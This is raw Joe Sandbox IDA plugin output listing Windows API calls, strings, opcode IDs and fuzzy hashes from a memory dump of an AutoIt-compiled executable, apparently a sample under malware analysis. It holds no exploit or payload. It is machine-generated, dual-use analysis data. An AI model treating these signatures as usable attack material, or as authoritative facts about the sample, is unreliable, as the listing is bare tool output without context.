                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                                                        • String ID: |
                                                                                                                                                        • API String ID: 1413715105-2343686810
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00AF961B
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AF9657
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                                        • String ID: static
                                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD5BE4
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AD5C1F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                                        APIs
                                                                                                                                                        • __snwprintf.LIBCMT ref: 00AE6BDD
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AF9269
                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF9274
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: Combobox
                                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                                        • Opcode ID: 2a8b4ac4929758db3234f62d507c0f0b635340875ef53cd44567ca4c13059e09
                                                                                                                                                        • Instruction ID: ef506780229b0692c6e0568aab6a36f902cea0241d241478275a92690ca5bcea
                                                                                                                                                        • Opcode Fuzzy Hash: 2a8b4ac4929758db3234f62d507c0f0b635340875ef53cd44567ca4c13059e09
                                                                                                                                                        • Instruction Fuzzy Hash: 7411607164020DBFEF25CF98DC81FFB37AAEB893A4F104125FA1897290D6719C518BA0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                                                                                                                                                          • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                                                                                                                                                          • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00AF9775
                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00AF978F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                        • String ID: static
                                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                                        • Opcode ID: a55a7001c7763e86d8fd4dbcfb1861d48e63e3b6f0d6b7fafcbe80a9373dc2b3
                                                                                                                                                        • Instruction ID: 25f0a4c5f316fd940285bbaa6a3382abea640dcb6237595f0a7e8f34de9ef7aa
                                                                                                                                                        • Opcode Fuzzy Hash: a55a7001c7763e86d8fd4dbcfb1861d48e63e3b6f0d6b7fafcbe80a9373dc2b3
                                                                                                                                                        • Instruction Fuzzy Hash: 2B113A72520209AFDB04DFB8CC45EFA7BB8EB08314F004929FA55E3150E735E851DB50
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00AF94A6
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AF94B5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                                                        • String ID: edit
                                                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                                                        • Opcode ID: 08f17c5123bb6cbe8d8b59b06a1410dcc0290c2e9a15be98b96b32b26b62c059
                                                                                                                                                        • Instruction ID: cea23f0193ff4d33b2c71507428af38a4fdab51f5e14c5f68eec6bd039b25385
                                                                                                                                                        • Opcode Fuzzy Hash: 08f17c5123bb6cbe8d8b59b06a1410dcc0290c2e9a15be98b96b32b26b62c059
                                                                                                                                                        • Instruction Fuzzy Hash: C3112B71500208AAEB108FA89C45FFB3B69EB25375F504724FA65971E0C7759C529B60
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD5CF3
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AD5D12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                                        • Opcode ID: 5e54dc80075e44d182921c6a0b34ab7a06e8af18173e983a155677cfa9d94637
                                                                                                                                                        • Instruction ID: a854de6b16e929465288ee2b0354a1bc8cebc8f60d320ac164b5059d468f13a3
                                                                                                                                                        • Opcode Fuzzy Hash: 5e54dc80075e44d182921c6a0b34ab7a06e8af18173e983a155677cfa9d94637
                                                                                                                                                        • Instruction Fuzzy Hash: B5119072D11618ABDB60DB7CD848B9977FAAB06744F180063ED92EB390D770AD04CBA1
                                                                                                                                                        APIs
                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AE544C
                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AE5475
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                        • String ID: <local>
                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                        • Opcode ID: 461396099bbee1d1185f14ad2d24f492ee1885f876470444856b156f4f540ced
                                                                                                                                                        • Instruction ID: 4736e5b2ab9d52da0334c6dd159a47330d7fd521907f253b45a659574efea5cd
                                                                                                                                                        • Opcode Fuzzy Hash: 461396099bbee1d1185f14ad2d24f492ee1885f876470444856b156f4f540ced
                                                                                                                                                        • Instruction Fuzzy Hash: 2C11A370941A61BADB158F629C84EFBFBAAFF1275AF10812AF54597080E7705980C6F0
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: htonsinet_addr
                                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                                                        • Opcode ID: 516a0455147a40dc8913819cf4f8c9726749ab54622c6666c508b44e005e8360
                                                                                                                                                        • Instruction ID: a05f2b4aa9741fe0389f8da0aa6ba43f4bcff17663e50ff0867469c9e4852372
                                                                                                                                                        • Opcode Fuzzy Hash: 516a0455147a40dc8913819cf4f8c9726749ab54622c6666c508b44e005e8360
                                                                                                                                                        • Instruction Fuzzy Hash: 6101D235200245ABCB10AFA9CC86FADB3B4EF14720F10852AF5169B2D1DA71F804C766
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ACC5E5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                                        • Opcode ID: 8c97d7aac7f13bc9d41fef823c5ed45eb91e613e1d20e4941f9af529a1039a84
                                                                                                                                                        • Instruction ID: 7753fa901284930978b3604af7e0be581d45d68fc80fc0e2de3837aba47ebcec
                                                                                                                                                        • Opcode Fuzzy Hash: 8c97d7aac7f13bc9d41fef823c5ed45eb91e613e1d20e4941f9af529a1039a84
                                                                                                                                                        • Instruction Fuzzy Hash: CE01F771A41518ABCB08EBA8CD52EFE73EAAF42360B540A1DF433E72D1DF3069089750
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                                                        • String ID: EA06
                                                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                                                        • Opcode ID: 332a796a55ae182d16f658cf36006627fa51b54c3a017a957b93f3fb4b43d6bf
                                                                                                                                                        • Instruction ID: 40017b521f75867c5a020953757f4d45c80378e898f417b4ab6b5904e4843a1d
                                                                                                                                                        • Opcode Fuzzy Hash: 332a796a55ae182d16f658cf36006627fa51b54c3a017a957b93f3fb4b43d6bf
                                                                                                                                                        • Instruction Fuzzy Hash: 9901B572944258BEDB28D7A8C856EFE7BF89B15711F00419BE193D62C2E5B4A708CB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ACC4E1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                                        • Opcode ID: 3a65a9e946807a1906abbf729a142f36144fbac8c3dba140fefcb14fe26fe11d
                                                                                                                                                        • Instruction ID: 4c0ee760eea42f6de5bcac7b4ce6067a1b3c1c5b413bb0c7b587ff9dede7691a
                                                                                                                                                        • Opcode Fuzzy Hash: 3a65a9e946807a1906abbf729a142f36144fbac8c3dba140fefcb14fe26fe11d
                                                                                                                                                        • Instruction Fuzzy Hash: B101DF71A415086BCB08EBA0CA62FFF73E99B01350F154019F902E72D1DA105E08A7A1
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ACC562
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                                        • Opcode ID: cf2b51b82d24a5b3ca09cf004b15e779c59b48ca2eac35874346e2cdca1480b5
                                                                                                                                                        • Instruction ID: 4652ea0dc440e1ff48ad57bd58c9702b1447d62e9b217369f77915d839e7018c
                                                                                                                                                        • Opcode Fuzzy Hash: cf2b51b82d24a5b3ca09cf004b15e779c59b48ca2eac35874346e2cdca1480b5
                                                                                                                                                        • Instruction Fuzzy Hash: 7E01AD71B81508ABCB05EBA4CA52FFF73E99B01751F550019F807E3291EA54AF09A7A1
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                                                        • String ID: #32770
                                                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                                                        • Opcode ID: 3b431c5598e34b8675e41cb03908f41f899efdaba7eb157cdf533fcda9841d71
                                                                                                                                                        • Instruction ID: a5c73b4b81860c4b59836b360737dd91de30857373349b2f4b4d947d35c79f47
                                                                                                                                                        • Opcode Fuzzy Hash: 3b431c5598e34b8675e41cb03908f41f899efdaba7eb157cdf533fcda9841d71
                                                                                                                                                        • Instruction Fuzzy Hash: 0AE0923360022927D720EAA59C0AFD7FBACEB55BA4F000066A914D3141EA709A4587D4
                                                                                                                                                        APIs
                                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ACB36B
                                                                                                                                                          • Part of subcall function 00AB2011: _doexit.LIBCMT ref: 00AB201B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message_doexit
                                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                                                        • Opcode ID: e1111d0d82ca29ddf970e3e2c2bd618ae36db158c696a521de2b824ef8e62f6f
                                                                                                                                                        • Instruction ID: 7b3e191025b33bc7e2f84f335ab501003158cf32c0dccbb445984a34ad101654
                                                                                                                                                        • Opcode Fuzzy Hash: e1111d0d82ca29ddf970e3e2c2bd618ae36db158c696a521de2b824ef8e62f6f
                                                                                                                                                        • Instruction Fuzzy Hash: 4BD0123138435832D21972987D0BFC96ACC4F05B51F514066BF4C965D38AD6958062A9
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00B0BAB8
                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B0BCAB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                        • String ID: WIN_XPe
                                                                                                                                                        • API String ID: 510247158-3257408948
                                                                                                                                                        • Opcode ID: ce972313bb6add65f340dcf18f761d924f6bb76a9d33a2d64fcbaa32b838e06d
                                                                                                                                                        • Instruction ID: 93d7ff69217b7793486a7d7e7636f57d12c56e85d229b9c04be22ce0ac64e8a5
                                                                                                                                                        • Opcode Fuzzy Hash: ce972313bb6add65f340dcf18f761d924f6bb76a9d33a2d64fcbaa32b838e06d
                                                                                                                                                        • Instruction Fuzzy Hash: 83E0A570D04109AFCB15DBA9C985EECBBB8BB08341F54849AE022B30A1CB715A459F25
                                                                                                                                                        APIs
                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF849F
                                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AF84B2
                                                                                                                                                          • Part of subcall function 00AD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                        • Opcode ID: 8605920abbd1ec35d2a80a8ce435d0caef9f040d3f65e52d9a9abe3e543da374
                                                                                                                                                        • Instruction ID: 65404003231d7d6fa6ea01e4b06b1a7fc1cbff219f883262784a9ff0f336bcee
                                                                                                                                                        • Opcode Fuzzy Hash: 8605920abbd1ec35d2a80a8ce435d0caef9f040d3f65e52d9a9abe3e543da374
                                                                                                                                                        • Instruction Fuzzy Hash: DCD0A932388320B7E620A330AC0FFC66A84AB14B00F040869720AAA2D0CCA0A8008220
                                                                                                                                                        APIs
                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF84DF
                                                                                                                                                        • PostMessageW.USER32(00000000), ref: 00AF84E6
                                                                                                                                                          • Part of subcall function 00AD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                        • Opcode ID: 57c16819cf0cdfca349add5459317f49b20159c928ff491425ee281a5b1c2d63
                                                                                                                                                        • Instruction ID: 1a4526b64b191301d2bd01de53d57d1012a38601896e2bbb8c31476950a27f80
                                                                                                                                                        • Opcode Fuzzy Hash: 57c16819cf0cdfca349add5459317f49b20159c928ff491425ee281a5b1c2d63
                                                                                                                                                        • Instruction Fuzzy Hash: F1D022323843207BE721A330AC0FFC77684AB18F00F040869730AAB2D0CCF0B800C220
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00ADD01E
                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00ADD035
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                        • String ID: aut
                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                        • Opcode ID: 43fd38e24fa875d5b163945039abc788c68bc0d6768f22619241776558a8edaa
                                                                                                                                                        • Instruction ID: 03c7e260acc296d56807d2e309b47b7491b85a67890e8c5ceda3bc494f2eca7d
                                                                                                                                                        • Opcode Fuzzy Hash: 43fd38e24fa875d5b163945039abc788c68bc0d6768f22619241776558a8edaa
                                                                                                                                                        • Instruction Fuzzy Hash: 49D05EB554030EBBDB10ABA0ED0EF99B7ACA704704F5081907625D20D1D7B4D7458BA0